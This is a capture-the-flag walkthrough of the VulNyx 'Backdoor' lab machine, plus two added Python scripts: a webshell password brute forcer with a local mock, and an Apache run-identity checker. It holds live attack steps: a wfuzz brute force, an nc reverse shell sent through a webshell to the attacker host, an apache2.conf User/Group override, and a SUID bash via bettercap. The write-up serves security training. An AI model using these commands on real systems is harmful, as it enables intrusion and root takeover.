🔴 NYX - Backdoor

#vulnyx #nyx #linux #apache2.conf (writable) #bettercap (sudo)

December 29, 2024 by Miguel R. (d4t4s3c)

Information

Backdoor is a Linux machine from the VulNyx platform, rated hard difficulty and created by the user d4t4s3c.

  • Initial access: The machine simulates an already-compromised system on which the attackers have set up persistence; a PHP webshell installed on the server is discovered and gives us a shell.
  • Privilege escalation: The user has sudo rights on a binary that allows breaking out to a shell as root.


Enumeration

Nmap

TCP
 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:29 CET
Nmap scan report for 192.168.1.88
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
 nmap -sVC -p22,80 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:30 CET
Nmap scan report for 192.168.1.88
Host is up (0.00087s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)

Shell (www-data)

80/TCP (HTTP)

Directory Brute Force
 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.88/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.88/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 277]
/Backdoor             (Status: 301) [Size: 315] [--> http://192.168.1.88/Backdoor/]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================

The /Backdoor path has no directory listing enabled and returns a 403 (Forbidden).

Since the directory is called Backdoor, I use the SecLists wordlist of common PHP backdoor file names against it.

 gobuster dir -w /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.1.88/Backdoor
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.88/Backdoor
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/php-backdoor.php     (Status: 200) [Size: 1432]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================

In php-backdoor.php I find a webshell that appears to be password protected.

Password Brute Force

Having no username to work with, I assume the webshell takes a single parameter called password (or similar) plus the command to run. The --hh=1432 filter hides every response whose size matches the unauthenticated page (the 1432 bytes gobuster reported), so only a response whose body actually changed is shown.

 wfuzz -c -w /opt/techyou.txt -d 'password=FUZZ&cmd=id' -u "http://192.168.1.88/Backdoor/php-backdoor.php" --hh=1432 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.88/Backdoor/php-backdoor.php
Total requests: 10000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                              
=====================================================================

000004806:   200        64 L     124 W      1486 Ch     "newpassword"                                                                                                        

Total time: 6.162413
Processed Requests: 10000
Filtered Requests: 9999
Requests/sec.: 1622.740

The password is newpassword, and with it I can run commands as the www-data user.

 curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=id" |tail -n1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
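The same brute force as a Python script, added here as an example (it is not code from the original post or from VulNyx). It does what the wfuzz run above does: POST each candidate as password=<cand>&cmd=id and report the first response whose length differs from the wrong-password baseline, the equivalent of --hh=1432. So that it runs offline it also starts a constructed mock of the protected webshell on localhost; the mock's accepted password, page contents and page size are assumptions, not measurements from the real target.

```python
"""Password brute force against a single-parameter PHP webshell (added example)."""
import sys
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

MOCK_PASSWORD = "newpassword"  # assumption for the mock, chosen to match the writeup's result
LOGIN_PAGE = (b"<html><body><h1>backdoor</h1><form method='post'>"
              b"<input name='password'><input name='cmd'><input type='submit'>"
              b"</form></body></html>")


class MockWebshell(BaseHTTPRequestHandler):
    """Constructed stand-in for php-backdoor.php: always answers 200 with the
    login page and appends command output only when the password is right."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        params = urllib.parse.parse_qs(self.rfile.read(length).decode())
        body = LOGIN_PAGE
        if params.get("password", [""])[0] == MOCK_PASSWORD:
            # the real shell would run params["cmd"]; the mock echoes a fixed id line
            body += b"\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_mock():
    """Serve the mock on an ephemeral localhost port; returns (server, url)."""
    srv = HTTPServer(("127.0.0.1", 0), MockWebshell)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/Backdoor/php-backdoor.php"


def run_cmd(url, password, cmd="id"):
    """One request exactly like the curl call above; returns the raw body."""
    data = urllib.parse.urlencode({"password": password, "cmd": cmd}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def brute_force(url, candidates):
    """Return (password, body) for the first candidate whose response size
    differs from the wrong-password baseline, or None if none does."""
    # A deliberately wrong value yields the baseline: the login page itself
    # (1432 bytes on the real target, whatever size the mock produces).
    baseline_len = len(run_cmd(url, "definitely-wrong-" + "x" * 16))
    for cand in candidates:
        body = run_cmd(url, cand)
        # Length filtering mirrors wfuzz --hh: it tolerates pages that vary
        # only in content (timestamps) but would miss a same-size error page.
        if len(body) != baseline_len:
            return cand, body
    return None


if __name__ == "__main__":
    # usage: python3 webshell_brute.py [wordlist] [url]
    # With no URL the constructed mock is used and a small inline list is tried.
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as f:
            wordlist = [line.rstrip("\r\n") for line in f]
    else:
        wordlist = ["123456", "password", "admin", "newpassword"]
    srv, url = (None, sys.argv[2]) if len(sys.argv) > 2 else start_mock()
    hit = brute_force(url, wordlist)
    print("no password found" if hit is None else f"password: {hit[0]}\n{hit[1].decode()}")
    if srv:
        srv.shutdown()
```

Against the real target you would pass the wordlist and the URL on the command line; the mock exists only so the detection logic (baseline size versus changed size) can be exercised without the box.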

Reverse Shell

Now that I can run commands, I try to get a reverse shell.

 curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"

I get a shell as the www-data user.

 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 45766
id ; hotname 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell (rootkit)

The www-data user can run the reboot binary as root via sudo.

(On its own this only lets us reboot the system.)

www-data@backdoor:/$ sudo -l
Matching Defaults entries for www-data on backdoor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on backdoor:
    (root) NOPASSWD: /usr/sbin/reboot

I find that www-data has write permission on /etc/apache2/apache2.conf.

www-data@backdoor:/$ find / -writable -type f 2>/dev/null |grep -vE "proc|sys|var"
/etc/apache2/apache2.conf

Given the permissions on /etc/apache2/apache2.conf, the account Apache runs as can be changed from www-data to rootkit, and rebooting with sudo reboot then applies the change. Apache honours the last User/Group directive it parses, so appending both lines overrides the User ${APACHE_RUN_USER} / Group ${APACHE_RUN_GROUP} lines earlier in the file. The target must be an existing unprivileged account: Apache refuses to serve as uid 0 unless it was built with -DBIG_SECURITY_HOLE, so jumping straight to root this way is not possible, hence the hop to rootkit first.

www-data@backdoor:/$ echo -en 'User rootkit\nGroup rootkit' >> /etc/apache2/apache2.conf
www-data@backdoor:/$ tail -n2 /etc/apache2/apache2.conf ;echo
User rootkit
Group rootkit
www-data@backdoor:/$ sudo -u root /usr/sbin/reboot

After the reboot I get a shell as the rootkit user.

 curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"
 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 55786
id ; hostname
uid=1000(rootkit) gid=1000(rootkit) groups=1000(rootkit)
backdoor
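A small checker for the two facts this step relies on, added as an example (not code from the original post or from the Apache project): effective_run_identity() applies Apache's rule that when User/Group appear more than once the last directive wins, which is why appending two lines was enough, and config_writable_by() reproduces the condition that turned it into an escalation, namely that the account Apache drops to can edit the file Apache reads as root on the next start. The Debian config excerpt and the envvars values are constructed to match stock Debian defaults; the function names are mine.

```python
"""Who does Apache really run as, and can that account rewrite the config? (added example)"""
import os
import re
import stat
import sys
import tempfile

DIRECTIVE = re.compile(r"^\s*(User|Group)\s+(\S+)", re.IGNORECASE)
VAR_REF = re.compile(r"\$\{(\w+)\}")

# Constructed excerpt of Debian's /etc/apache2/apache2.conf (stock values).
DEBIAN_APACHE_CONF = """\
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
</Directory>
"""

# Constructed /etc/apache2/envvars values (Debian default).
DEBIAN_ENVVARS = {"APACHE_RUN_USER": "www-data", "APACHE_RUN_GROUP": "www-data"}


def effective_run_identity(conf_text, envvars=None):
    """Return the (user, group) Apache will switch to after parsing conf_text.
    Later directives override earlier ones, so an appended 'User x' wins even
    though 'User ${APACHE_RUN_USER}' still sits near the top of the file."""
    envvars = envvars or {}
    identity = {"user": None, "group": None}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # blanks and comments
            continue
        m = DIRECTIVE.match(line)
        if not m:
            continue
        value = VAR_REF.sub(lambda v: envvars.get(v.group(1), ""), m.group(2))
        identity[m.group(1).lower()] = value
    return identity["user"], identity["group"]


def config_writable_by(path, uid, gids):
    """True if an account with this uid and these group ids can write path,
    judged from the mode bits only (no ACL or capability checks)."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def demo_backdoor_edit():
    """Replay the writeup's edit on a temp copy of the config and return
    (identity_before, identity_after, writable_by_webuser)."""
    before = effective_run_identity(DEBIAN_APACHE_CONF, DEBIAN_ENVVARS)
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as f:
        f.write(DEBIAN_APACHE_CONF)
        path = f.name
    try:
        os.chmod(path, 0o666)  # the misconfiguration that find -writable surfaced
        # uid 33 (www-data) owns nothing here, so only the o+w bit makes this True
        writable = config_writable_by(path, 33, [33])
        with open(path, "a") as f:
            f.write("User rootkit\nGroup rootkit")  # the bytes echo -en appended
        with open(path) as f:
            after = effective_run_identity(f.read(), DEBIAN_ENVVARS)
    finally:
        os.unlink(path)
    return before, after, writable


if __name__ == "__main__":
    # Audit a live config: python3 apache_identity.py /etc/apache2/apache2.conf
    if len(sys.argv) > 1:
        env = dict(DEBIAN_ENVVARS)
        env.update({k: v for k, v in os.environ.items() if k.startswith("APACHE_")})
        with open(sys.argv[1]) as f:
            user, group = effective_run_identity(f.read(), env)
        print(f"apache runs as {user}:{group}")
        print("config writable by current user:",
              config_writable_by(sys.argv[1], os.getuid(), os.getgroups()))
    else:
        print(demo_backdoor_edit())
```

The defensive reading is the same as the offensive one: any Apache configuration file (apache2.conf, the envvars file, anything under conf-enabled or sites-enabled) that the web user can write is a path to every other local account the service can be restarted under, so it belongs in the root-owned, 0644 category alongside sudoers.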

Privilege Escalation

The rootkit user can run the bettercap binary as root via sudo.

rootkit@backdoor:/$ sudo -l
Matching Defaults entries for rootkit on backdoor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rootkit may run the following commands on backdoor:
    (root) NOPASSWD: /usr/bin/bettercap

Looking at bettercap's help menu, the ! command will "Execute a shell command and print its output", which runs with the privileges of the bettercap process, i.e. root.

rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap

bettercap v2.32.0 (built for linux amd64 with go1.15.15) [type 'help' for a list of commands]

192.168.1.0/24 > 192.168.1.88  » [18:14:33] [sys.log] [war] Could not find mac for 
192.168.1.0/24 > 192.168.1.88  » help

           help MODULE : List available commands or show module specific help if no module name is provided.
                active : Show information about active modules.
                  quit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
        set NAME VALUE : Set the VALUE of variable NAME.
  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
                 clear : Clear the screen.
        include CAPLET : Load and run this caplet in the current session.
             ! COMMAND : Execute a shell command and print its output.
        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

I set the SUID bit (mode 4755) on /bin/bash.

rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap

192.168.1.0/24 > 192.168.1.88  » !ls -l /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
192.168.1.0/24 > 192.168.1.88  » !chmod 4755 /bin/bash
192.168.1.0/24 > 192.168.1.88  » !ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
192.168.1.0/24 > 192.168.1.88  » exit

I become root by running bash with -p, which keeps the SUID-granted effective uid instead of dropping back to the real uid.

rootkit@backdoor:/$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(rootkit) gid=1000(rootkit) euid=0(root) groups=1000(rootkit)
backdoor

Flags

Now running as root, I can read the user.txt and root.txt flags.

bash-5.1# find / -name user.txt -o -name root.txt |xargs cat
d9e69***************************
40390***************************

That wraps up the Backdoor machine.

Happy Hacking!


© d4t4s3c 2023-2025
